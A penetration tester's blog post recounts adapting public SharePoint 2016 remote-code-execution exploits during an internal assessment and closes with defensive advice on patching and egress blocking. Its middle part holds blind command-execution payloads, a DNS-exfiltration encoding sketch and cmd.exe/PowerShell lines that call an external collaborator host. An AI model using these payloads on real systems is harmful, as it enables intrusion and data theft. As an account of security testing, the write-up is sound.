SharePoint is generally used as an intranet site to share news and other internal company information; I’ve encountered it at organizations ranging from SMBs to large enterprises across industries. From a penetration tester’s point of view, it is another out-of-the-box product, and not a particularly fancy one to test. Why not? Within the short timeframe of a penetration test, the consultant does not have time to delve deeply into the internal mechanics of complex software. Recreating the installation locally to mimic the real thing and hunting for new vulnerabilities through security research is simply not efficient. Instead, we usually focus on misconfigurations and on the public disclosures of other security researchers. Even reusing another researcher’s work requires that the pentester gather information about the target and adjust the publicly known exploits accordingly.
This story started during one of my recent assessments, when I was assigned to test an on-premise internal SharePoint 2016 site. Initial enumeration showed that the target was running SharePoint version 22.214.171.12481. I assumed this based on the MicrosoftSharePointTeamServices response header returned by the application (from which you can estimate that the version was released around April 2018). At that point, I started looking for publicly known exploits and research papers. The past year had brought several public SharePoint exploits, but my attention was on the following research:
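This fingerprinting step is easy to script. The sketch below, with a hypothetical helper name and an illustrative header value, simply pulls the MicrosoftSharePointTeamServices header out of an HTTP response; it is my own illustration, not tooling from the assessment.

```python
# Sketch: fingerprint SharePoint via its MicrosoftSharePointTeamServices
# response header. The URL and function names here are illustrative.
import urllib.request

def sharepoint_build(headers):
    """Return the MicrosoftSharePointTeamServices header value, if present."""
    for name, value in headers:
        if name.lower() == "microsoftsharepointteamservices":
            return value
    return None

def fingerprint(url):
    # HEAD request is enough: we only care about the response headers.
    req = urllib.request.Request(url, method="HEAD")
    with urllib.request.urlopen(req) as resp:
        return sharepoint_build(resp.getheaders())
```

The returned build number can then be matched against public SharePoint build-to-patch tables to estimate the patch level.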
I decided to focus on the above exploits, as both could allow remote code execution (RCE) on the target. Additionally, both were well written and detailed exactly where the security issues lay. These exploits did not work out of the box, so I tried to quickly mimic the encountered version on my own virtual machine and started investigating what was wrong. First, I realized that the default permissions differed from those on my target. I fixed that by finding a user who had the proper kind of permissions.
Then the next problem showed up. Everything looked right, but the payload was not executed on the target – I saw no effect from it at all. This one was related to the target’s environment rather than the software version; I assumed so because the exploit worked in my test environment but not against the target. How could I overcome this blocker?
At the back of my mind, I kept telling myself to make things simpler and divide the problem into smaller ones (divide and conquer). So I went through the exploit step by step. This way I ensured that I understood the exploit and confirmed that each step worked, and I narrowed the issue down to the injected command itself. I needed a blind technique that would confirm command execution. Example blind techniques:
- Create a simple text file that is accessible via the web interface
- Time-based commands which lag execution for a specific time
- External DNS interaction (DNS name resolution)
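The three checks above boil down to simple cmd.exe one-liners. Here is a sketch of how I think of them; the web root path, delay duration, and collaborator domain are placeholders, not the real target values.

```python
# Sketch of the three blind command-execution checks as cmd.exe arguments.
# The webroot default and collaborator domain are illustrative placeholders.
def blind_payloads(collab_domain,
                   webroot=r"C:\inetpub\wwwroot\wss\VirtualDirectories\80"):
    return {
        # 1. Drop a marker file reachable over HTTP (assumes a default web root).
        "file": f'/c echo pwned > "{webroot}\\poc.txt"',
        # 2. Delay the response: pinging localhost 11 times lags ~10 seconds.
        "time": "/c ping -n 11 127.0.0.1 > nul",
        # 3. Force an outbound DNS lookup of an attacker-controlled name.
        "dns": f"/c nslookup {collab_domain}",
    }
```

Each value is what would replace the injected command in the exploit; a noticeably delayed response, a retrievable file, or a DNS hit at the collaborator each confirms execution without seeing command output.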
The first two didn’t work. It could be that the application was not installed in the default location, that a Web Application Firewall (WAF) was in use, or some other unknown reason. However, I did get a DNS interaction: the server tried to resolve the DNS name I provided, which confirmed command execution. That was a big surprise, as it was an internal server – conclusion: never assume anything. From that point, I constructed more complex commands to put into the payload.
To exfiltrate data from the server, I used the Collabfiltrator extension for Burp Suite. It allows the exfiltration of data through DNS queries sent to your Burp Collaborator.
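The underlying idea of DNS exfiltration, as tools like Collabfiltrator implement it, is to encode command output into a DNS-safe alphabet and ship it in chunks as subdomain labels, so each chunk arrives at the collaborator as a lookup. A minimal sketch of that encoding (my own illustration, with a placeholder domain; not Collabfiltrator's actual format):

```python
# Sketch: encode data for DNS-based exfiltration. Hex keeps the labels
# within the DNS alphabet; labels must stay under 63 characters.
def dns_exfil_names(data: bytes, domain: str, label_len: int = 60):
    encoded = data.hex()
    chunks = [encoded[i:i + label_len]
              for i in range(0, len(encoded), label_len)]
    # Prefix each label with its index so the listener can reorder lookups,
    # which may arrive out of order.
    return [f"{i}-{chunk}.{domain}" for i, chunk in enumerate(chunks)]
```

On the target, each generated name would be resolved (e.g. via `nslookup`); on the attacker’s side, the collaborator logs the queries and the hex chunks are reassembled in index order.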
Here is the list of OS commands used in the payload (from the simplest to the most complex):
- ("cmd.exe", "/c ping [REDACTED_BURP_COLLABORATOR]/test.html")
- ("cmd.exe", "/c powershell Invoke-RestMethod -Uri https://trustwave.[REDACTED_BURP_COLLABORATOR]/test.html")
- ("cmd.exe", "/c powershell -enc [PAYLOAD_GENERATED_BY_COLLABFILTRATOR]")
I showed how simple things matter from an attacker’s perspective by taking small steps and trying very simple payloads. The same applies to the defensive side. Following security basics like patching, deny by default, and least privilege can work wonders: a potential attacker can be slowed down or stopped by these simple compensating controls. In the described scenario, implementing deny by default (by blocking Internet-bound traffic from internal-only servers) would have made it harder to confirm code execution, and a regular patching process would have reduced the impact and probability of exploitation even further.
Hopefully, I’ve convinced you that taking simple steps and dividing bigger problems into smaller ones can take you to the next level as an attacker and as a defender – and, by analogy, perhaps in other areas too. In summary, simple techniques allowed us to confirm and exploit a vulnerability, while doing the basics would have prevented exploitation.